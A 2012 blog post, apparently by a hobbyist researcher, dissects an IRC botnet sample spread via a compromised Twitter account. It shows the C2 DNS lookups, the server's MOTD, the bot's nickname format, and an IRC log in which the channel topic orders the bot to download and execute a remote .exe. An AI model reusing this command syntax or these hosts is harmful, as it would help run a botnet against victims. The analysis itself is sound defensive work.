Skip navigation

Monthly Archives: June 2012

So I found an interesting site that parsed Twitter feeds for potentially malicious links. Based on the filenames mentioned, it did so with reasonable accuracy. So I did what any sensible person would do: fired up a handy Windows XP VM and followed some links.

The first bit of malware was not difficult to find. A compromised Twitter account has been spamming links for the past week, using the much loved .jpg.exe gambit.

I set wireshark to run, and with bated breath, ran the executable.

3	10.0.2.15	194.168.4.100	Standard query A xx.wshells.ws
4	194.168.4.100	10.0.2.15	Standard query response, No such name
5	10.0.2.15	194.168.4.100	Standard query A bxxxa.wshells.ws
6	194.168.4.100	10.0.2.15	Standard query response A 208.xx.xx.77

Straight away, it made two DNS requests, both looking for subdomains of wshells.ws. wshells.ws offers hosting, shells and IRC services to anyone with a few dollars to spare, per month. Consulting their FAQ, “abusive” botnets are not allowed, but no abuse email is listed on the contact page.

Anyway. As you can see, the response from the DNS lookup was that bxxxa.wshells.ws was located at 208.xx.xx.77. I watched as the program connected to an IRC channel. The MOTD informed me that this was one of 13 botnet servers, running an IRC daemon modified by unKn0wn Crew. A quick google shows that this is a modded version of the popular Unreal IRCd. Doesn’t take much more digging to find the (alleged) source of the modified daemon.

echo "|     UnrealIRCd - Modded by iD [uNkn0wn-Crew]     |"
echo "|          www.uNkn0wn.eu - iD@uNkn0wn.eu          |"
echo "|--------------------------------------------------|"
echo "|     IT IS VERY PRIVATE, SO DO NOT DISTRIBUTE     |"

The server itself seems to be run by a different group.

Irc.D3v1Lz.Com Message of the Day - 
5/4/2012 15:17
###################################################
# ________  ________       ____.____              #
# \______ \ \_____  \__  _/_   |    |    ________ #
#  |    |  \  _(__     \/ /|   |    |    \___   / #
#  |    `   \/       \   / |   |    |___  /    /  #
# /_______  /______  /\_/  |___|_______ \/_____ \ #
#         \/       \/                  \/      \/ #
# __________        __   _______          __      #
# \______   \ _____/  |_ \      \   _____/  |_    #
#  |    |  _//  _ \   __\/   |   \_/ __ \   __\   #
#  |    |   (   )  | /    |    \  ___/   |  |     #
#  |______  /\____/|__| \____|__  /\___   __|     #
#         \/                    \/     \/         #
###################################################
      D3v1Lz BotNet Server, Just Stay Away   
   1 Of 13 BotNet Server Managed By Sh "Opper"
               Testing Server

From what I can tell, the nickname that the malware uses upon connection to the server is of the form:

[?]{[countrycode]|[OS]}[randomisedname]

for example:

a{USA|XPa}qafsffg

After connecting, the following exchange was had:

JOIN #$wsh [pass removed]
:n{GB|XPa}a{USA|XPa}qafsffg@host.name.redacted.com JOIN :#$wsh
:Irc.D3v1Lz.Com 332 a{USA|XPa}qafsffg #$wsh :@nd http://up2x.com/u/1943960303.image001234.exe
:Irc.D3v1Lz.Com 333 a{USA|XPa}qafsffg #$wsh Sp5 1340769512
PRIVMSG #$wsh :[d="hxxp://up2x.com/u/1943960303.image001234.exe" s="387584 bytes"] Executed file "C:\Documents and Settings\Administrator\Application Data\207.exe" - Download retries: 0
:Irc.D3v1Lz.Com 404 a{USA|XPa}qafsffg #$wsh :You must have a registered nick (+r) to talk on this channel (#$wsh)
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com

Wireshark shows that at this time, a DNS request was made to resolve up2x.com, and download 1943960303.image001234.exe, reporting the success back to the control channel. I may analyse the dropped executables in another post. After a few minutes of ping-pong between the VM and the IRC server, I exported the dump, and shut down the VM.

I expect this is an upcoming project of someone’s. The IRC channel was empty except for me, and as the MOTD says, it’s a testing server. Furthermore, the compromised twitter account has only been spamming malware links for about a week.

Advertisements